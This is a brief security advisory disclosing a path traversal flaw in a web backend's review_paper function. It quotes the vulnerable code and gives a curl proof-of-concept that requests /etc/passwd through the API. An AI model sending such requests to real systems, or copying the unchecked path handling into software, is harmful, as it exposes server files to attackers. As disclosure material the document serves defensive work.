A critical path traversal vulnerability (CWE-22) has been identified in the review_paper function in backend/app.py. The vulnerability allows malicious users to access arbitrary PDF files on the server by providing crafted file paths that bypass the intended security restrictions.
This vulnerability allows attackers to: - Read any PDF file accessible to the server process - Potentially access sensitive documents outside the intended directory - Perform reconnaissance on the server's file system structure
The issue occurs in the review_paper function around line 744:
if pdf_path.startswith("/api/files/"):
# Safe path handling for API routes
relative_path = pdf_path[len("/api/files/"):]
generated_base = os.path.join(project_root, "generated")
absolute_pdf_path = os.path.join(generated_base, relative_path)
else:
absolute_pdf_path = pdf_path # VULNERABLE: Direct use of user input
curl -X POST http://localhost:5000/api/review \
-H "Content-Type: application/json" \
-d '{"pdf_path": "/etc/passwd"}'
This vulnerability was discovered and reported by Ruizhe.